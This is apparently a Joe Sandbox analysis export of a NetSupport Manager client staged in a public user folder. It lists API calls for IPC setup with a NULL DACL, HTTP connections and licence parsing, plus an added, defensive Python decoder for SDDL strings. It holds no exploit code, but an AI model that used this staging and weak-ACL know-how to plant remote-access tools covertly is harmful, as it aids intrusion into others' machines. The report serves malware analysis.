Control-flow Graph (function 1109e190; the rendered graph with its executed / not-executed block colouring is not reproduced here). Block sequence recoverable from the graph: call 1109d440 (token privilege adjustment) → LocalAlloc → InitializeSecurityDescriptor, SetSecurityDescriptorDacl, GetVersionExA → calls 1109d3a0 / 1109d3f0 (Advapi32 load and ConvertStringSecurityDescriptorToSecurityDescriptorA lookup) → GetSecurityDescriptorSacl → SetSecurityDescriptorSacl → FreeLibrary → CreateFileMappingA → GetLastError (error and "map exists" paths with LocalFree cleanup) → MapViewOfFile → GetModuleFileNameA → _memset, GetTickCount → GetCurrentProcessId, GetModuleFileNameA → four CreateEventA calls, each followed by GetLastError on failure → LocalFree → CreateThread (or GetCurrentThreadId) → ResetEvent ×3, SetEvent → call 1109d4d0.
                                                                                      APIs
                                                                                        • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,A1BC2D8B,00080000,00000000,00000000), ref: 1109D46D
                                                                                        • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                        • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                        • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                      • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,A1BC2D8B,00080000,00000000,00000000), ref: 1109E225
                                                                                      • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
                                                                                      • GetVersionExA.KERNEL32(?), ref: 1109E260
                                                                                      • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
                                                                                      • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
                                                                                      • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
                                                                                      • CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
                                                                                      • GetLastError.KERNEL32 ref: 1109E33D
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E366
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E373
                                                                                      • GetLastError.KERNEL32 ref: 1109E390
                                                                                      • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E3D9
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E3E6
                                                                                        • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
                                                                                        • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E4DB
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E4E8
                                                                                      • _memset.LIBCMT ref: 1109E500
                                                                                      • GetTickCount.KERNEL32 ref: 1109E508
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 1109E5B4
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
                                                                                      • GetLastError.KERNEL32 ref: 1109E624
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E62B
                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
                                                                                      • GetLastError.KERNEL32 ref: 1109E669
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E670
                                                                                      • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
                                                                                      • GetLastError.KERNEL32 ref: 1109E6AF
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E6B6
                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
                                                                                      • GetLastError.KERNEL32 ref: 1109E6FA
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E6FD
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E725
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E732
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1109E763
                                                                                      • CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7AC
                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7B2
                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7B8
                                                                                      • SetEvent.KERNEL32(?), ref: 1109E7BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                      • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                      • API String ID: 3291243470-2792520954
                                                                                      • Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                      • Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
                                                                                      • Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                      • Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51
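The API listing above shows how this function protects the IPC file mapping it creates: it enables SeSecurityPrivilege, calls SetSecurityDescriptorDacl with the DACL-present flag set and a NULL DACL pointer (a NULL DACL grants every principal full access), converts the SDDL string S:(ML;;NW;;;LW) with ConvertStringSecurityDescriptorToSecurityDescriptorA and applies it as the SACL, then calls CreateFileMappingA, MapViewOfFile and four CreateEventA calls, matching the "IPC(%s) created" / "Error filemap exists" strings. The script below is an added example, not code from the report or from NetSupport: it parses the SDDL subset needed to read that string (plus owner, group and DACL components, including the D:NO_ACCESS_CONTROL spelling of a NULL DACL) and reports what the descriptor allows. The ACE type, rights and SID alias tables are the documented SDDL abbreviations; the assessment rules are this example's own heuristics.

```python
"""Decode Windows SDDL and explain what an object's protection allows.

Added example, not code from the sandbox report or from NetSupport. Parses
the SDDL subset needed for S:(ML;;NW;;;LW) and common DACL strings. The
SYSTEM_MANDATORY_LABEL ACE with NO_WRITE_UP on the Low label (S-1-16-4096)
only blocks writers below Low integrity, so any process running at Low or
above can write to the object; with a NULL DACL nothing else restricts it.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

ACE_TYPES = {
    "A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED",
    "OA": "OBJECT_ACCESS_ALLOWED", "OD": "OBJECT_ACCESS_DENIED",
    "AU": "SYSTEM_AUDIT", "AL": "SYSTEM_ALARM",
    "ML": "SYSTEM_MANDATORY_LABEL",
}
RIGHTS = {
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE",
    "GX": "GENERIC_EXECUTE", "FA": "FILE_ALL_ACCESS", "FR": "FILE_GENERIC_READ",
    "FW": "FILE_GENERIC_WRITE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    # Mandatory-label policy bits, only meaningful inside an ML ACE
    "NW": "NO_WRITE_UP", "NR": "NO_READ_UP", "NX": "NO_EXECUTE_UP",
}
SIDS = {
    "WD": "S-1-1-0 (Everyone)", "AU": "S-1-5-11 (Authenticated Users)",
    "SY": "S-1-5-18 (Local System)", "BA": "S-1-5-32-544 (Administrators)",
    "BU": "S-1-5-32-545 (Users)", "IU": "S-1-5-4 (Interactive)",
    "LW": "S-1-16-4096 (Low Mandatory Level)",
    "ME": "S-1-16-8192 (Medium Mandatory Level)",
    "HI": "S-1-16-12288 (High Mandatory Level)",
    "SI": "S-1-16-16384 (System Mandatory Level)",
}
NULL_ACL = "NO_ACCESS_CONTROL"   # SDDL spelling of a present-but-NULL ACL


@dataclass
class Ace:
    ace_type: str
    flags: str            # inheritance/audit flags, kept as written
    rights: List[str]
    sid: str


@dataclass
class SecurityDescriptor:
    owner: Optional[str] = None
    group: Optional[str] = None
    dacl: Optional[List[Ace]] = None   # None: no D: component in the string
    dacl_null: bool = False            # D:NO_ACCESS_CONTROL
    sacl: Optional[List[Ace]] = None
    sacl_null: bool = False


def _sid(tok: str) -> str:
    return SIDS.get(tok, tok)          # unknown aliases and raw S-1-... pass through


def _rights(tok: str) -> List[str]:
    if tok.startswith("0x"):
        return [tok]                   # raw access mask, left as written
    return [RIGHTS.get(tok[i:i + 2], tok[i:i + 2]) for i in range(0, len(tok), 2)]


def _acl(body: str):
    """Return (aces, is_null) for the text following 'D:' or 'S:'."""
    if body == NULL_ACL:
        return [], True
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", body):    # ACL flags such as P/AI/AR precede the first '('
        f = ace.split(";")
        if len(f) != 6:                              # type;flags;rights;object_guid;inherit_guid;sid
            raise ValueError(f"malformed ACE: ({ace})")
        aces.append(Ace(ACE_TYPES.get(f[0], f[0]), f[1], _rights(f[2]), _sid(f[5])))
    return aces, False


def parse_sddl(sddl: str) -> SecurityDescriptor:
    sd = SecurityDescriptor()
    # Components start with O:, G:, D: or S:; ACE bodies sit in parentheses
    # and never contain ':', so splitting on the next marker is safe.
    for key, body in re.findall(r"([OGDS]):((?:(?![OGDS]:).)*)", sddl):
        if key == "O":
            sd.owner = _sid(body)
        elif key == "G":
            sd.group = _sid(body)
        elif key == "D":
            sd.dacl, sd.dacl_null = _acl(body)
        else:
            sd.sacl, sd.sacl_null = _acl(body)
    return sd


def assess(sd: SecurityDescriptor) -> List[str]:
    """Heuristic findings (this example's own rules) a reviewer would call out."""
    findings = []
    if sd.dacl_null:
        findings.append("NULL DACL: every principal gets full access")
    for ace in sd.dacl or []:
        if ace.ace_type == "ACCESS_ALLOWED" and ace.sid.startswith("S-1-1-0") \
                and {"GENERIC_ALL", "GENERIC_WRITE", "FILE_ALL_ACCESS"} & set(ace.rights):
            findings.append(f"Everyone may write: {ace.rights}")
    for ace in sd.sacl or []:
        if ace.ace_type == "SYSTEM_MANDATORY_LABEL":
            policy = ",".join(ace.rights)
            if ace.sid.startswith("S-1-16-4096"):
                findings.append(f"Low integrity label ({policy}): writable from any "
                                "process at Low integrity or above, sandboxed ones included")
            else:
                findings.append(f"Mandatory label {ace.sid} with policy {policy}")
    return findings


if __name__ == "__main__":
    # The SACL string recovered from this function, as reported above.
    for line in assess(parse_sddl("S:(ML;;NW;;;LW)")):
        print(line)
```

The parser deliberately keeps unknown aliases and raw access masks as written rather than guessing, so a string it cannot fully decode still round-trips into the findings instead of raising.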

Control-flow Graph (function 11029590; the rendered graph with its executed / not-executed block colouring is not reproduced here). Block sequence recoverable from the graph: LoadLibraryA → GetProcAddress → InternetCloseHandle (SetLastError on lookup failure) → _malloc → GetProcAddress, GetLastError, _free / _malloc → GetProcAddress → GetProcAddress → InternetOpenA → _free → further GetProcAddress lookups with SetLastError on failure → InternetConnectA → GetProcAddress → GetLastError → GetDesktopWindow → GetProcAddress → SetLastError → FreeLibrary.
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(WinInet.dll,A1BC2D8B,74DF23A0,?,00000000), ref: 110295C5
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
                                                                                      • InternetCloseHandle.WININET(000000FF), ref: 1102966D
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029673
                                                                                      • _malloc.LIBCMT ref: 11029697
                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
                                                                                      • GetLastError.KERNEL32 ref: 110296D2
                                                                                      • _free.LIBCMT ref: 110296DE
                                                                                      • _malloc.LIBCMT ref: 110296E7
                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
                                                                                      • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
                                                                                      • InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029764
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029771
                                                                                      • SetLastError.KERNEL32(00000078), ref: 1102977B
                                                                                      • _free.LIBCMT ref: 11029785
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
                                                                                      • SetLastError.KERNEL32(00000078), ref: 1102981E
                                                                                      • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                      • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                      • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                      • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorLast$Internet$FreeLibrary_free_malloc$CloseConnectHandleHeapLoadOpen
                                                                                      • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                      • API String ID: 3053051410-913974648
                                                                                      • Opcode ID: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                      • Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
                                                                                      • Opcode Fuzzy Hash: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                      • Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60

                                                                                      Control-flow Graph (rendered graph not reproduced in this export)
                                                                                      APIs
                                                                                        • Part of subcall function 6C5D2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6C5D2ACB
                                                                                        • Part of subcall function 6C5D2A90: _strrchr.LIBCMT ref: 6C5D2ADA
                                                                                        • Part of subcall function 6C5D2A90: _strrchr.LIBCMT ref: 6C5D2AEA
                                                                                        • Part of subcall function 6C5D2A90: wsprintfA.USER32 ref: 6C5D2B05
                                                                                        • Part of subcall function 6C5EDBD0: _malloc.LIBCMT ref: 6C5EDBE9
                                                                                        • Part of subcall function 6C5EDBD0: wsprintfA.USER32 ref: 6C5EDC04
                                                                                        • Part of subcall function 6C5EDBD0: _memset.LIBCMT ref: 6C5EDC27
                                                                                      • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6C5E7057
                                                                                      • InitializeCriticalSection.KERNEL32(6C61B898), ref: 6C5E70DF
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5E70EF
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5E7115
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5E713B
                                                                                      • WSAStartup.WSOCK32(00000101,6C61B91A), ref: 6C5E7167
                                                                                      • _malloc.LIBCMT ref: 6C5E71A3
                                                                                        • Part of subcall function 6C5F1B69: __FF_MSGBANNER.LIBCMT ref: 6C5F1B82
                                                                                        • Part of subcall function 6C5F1B69: __NMSG_WRITE.LIBCMT ref: 6C5F1B89
                                                                                        • Part of subcall function 6C5F1B69: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6C5FD3C1,6C5F6E81,00000001,6C5F6E81,?,6C5FF447,00000018,6C617738,0000000C,6C5FF4D7), ref: 6C5F1BAE
                                                                                      • _memset.LIBCMT ref: 6C5E71D3
                                                                                      • _calloc.LIBCMT ref: 6C5E7214
                                                                                      • _malloc.LIBCMT ref: 6C5E728B
                                                                                      • _memset.LIBCMT ref: 6C5E72C1
                                                                                      • _malloc.LIBCMT ref: 6C5E72CD
                                                                                      • _memset.LIBCMT ref: 6C5E7303
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E7361
                                                                                      • CreateThread.KERNEL32(00000000,00004000,6C5E6BA0,00000000,00000000,6C61BACC), ref: 6C5E737E
                                                                                      • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6C5E73AC
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\Support\,00000104), ref: 6C5E7430
                                                                                      • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\Public\Netstat\Support\pci.ini), ref: 6C5E74B0
                                                                                      • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6C5E74C0
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6C5E7566
                                                                                      • timeBeginPeriod.WINMM(00000001), ref: 6C5E7573
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                      • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$051829$C:\Users\Public\Netstat\Support\$C:\Users\Public\Netstat\Support\pci.ini$General$HTCTL32$NSM165348$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                      • API String ID: 3301999572-1741121462
                                                                                      • Opcode ID: 5d081a41dfd9bf93e5597d3cba939311992e1d2ed10c0aeecb4869c2e8a98381
                                                                                      • Instruction ID: 0dee276890cdb34187167312b63104ddfd4d8682cb2b258eb1bb316ee71beeed
                                                                                      • Opcode Fuzzy Hash: 5d081a41dfd9bf93e5597d3cba939311992e1d2ed10c0aeecb4869c2e8a98381
                                                                                      • Instruction Fuzzy Hash: 2DD1B4F0A04305AFDB10AF6E8CC695A7BF8EB4A34AF55492AE405D7F41D630AC448F9D
                                                                                      APIs
                                                                                        • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,0286B8D0,000000FF,?), ref: 11144ED5
                                                                                        • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0286B8D0,000000FF,?), ref: 11144EE5
                                                                                      • _fgets.LIBCMT ref: 11061DC2
                                                                                      • _strpbrk.LIBCMT ref: 11061E29
                                                                                      • _fgets.LIBCMT ref: 11061F2C
                                                                                      • _strpbrk.LIBCMT ref: 11061FA3
                                                                                      • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                      • _fgets.LIBCMT ref: 11062035
                                                                                      • _strpbrk.LIBCMT ref: 1106205B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                      • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                      • API String ID: 716802716-1571441106
                                                                                      • Opcode ID: 138079b93c76e623c3914dadf52ec1966105b04443ff76c6d6b694830cc74feb
                                                                                      • Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
                                                                                      • Opcode Fuzzy Hash: 138079b93c76e623c3914dadf52ec1966105b04443ff76c6d6b694830cc74feb
                                                                                      • Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61

                                                                                      Control-flow Graph (rendered graph not reproduced in this export)
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 111435A3
                                                                                      • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                      • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                      • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                      • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                      • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                      • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                      • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                      • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                      • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                      • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                      • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                      • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
